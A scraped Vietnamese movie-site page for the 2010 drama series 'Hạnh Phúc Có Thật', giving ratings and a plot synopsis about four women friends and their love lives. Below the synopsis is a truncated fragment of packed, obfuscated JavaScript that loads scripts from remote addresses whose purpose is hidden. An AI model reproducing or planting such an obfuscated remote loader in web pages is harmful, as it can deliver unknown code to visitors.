Banner C1
Banner C1

Phim

Hạnh Phúc Có Thật - 30 Tập

Xem Phim Hạnh Phúc Có Thật
167162 lượt xem

30/30 Phim Tình CảmPhim Tâm Lý Phim Việt Nam

Đạo Diễn: Xuân Cường

Thời lượng: 30 Tập

Năm phát hành: 2010

Xem phimTải Phim

4.6
153 Star | 33 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Phim Hạnh Phúc Có Thật: An Nhi, Nhất Tâm, Hà và Trà là 4 cô gái dù ở độ tuổi và hoàn cảnh khác nhau nhưng họ lại trở nên thân thiết với nhau do quan nhau từ một câu lạc bộ. Họ luôn sát cánh và chia sẽ với nhau mọi chuyện vui buồn trong cuộc sống. Tâm là bác sĩ tâm lý chuyên đi giải tỏa nỗi lòng cho người khác nhưng chính chị lại không thế cứu vãn được gia đình mình. Chồng chị là Bách - trưởng ban biên tập đài truyền hình luôn phải e dè trước một người quá mạnh mẽ và cầu toàn như chị để rồi siêu lòng trước cô bạn yếu đuối của chị. 

Hạnh Phúc Có Thật

Phim Hạnh Phúc Có Thật còn có Hà và Trà cùng điểm chung là tôn thờ chủ nghĩa độc thân và chán ghét đàn ông thế nhưng cả hai lại rơi vào lưới tình để rồi đau khổ. Hà lại đem lòng yêu kẻ chuyên coi tình yêu là trò đùa như Vinh, còn Trà lại yêu tên giám đốc Nguyên ngang tàng và kiêu căng. Còn An Nhi lại là cô ca sĩ nhưng lại trót dại có con với ông bầu để cuộc đời cô cũng gặp nhiều sóng gió.

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
9.2
33
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Hạnh Phúc Có Thật

Banner C1

User Online
Banner C1
Banner C1
loading...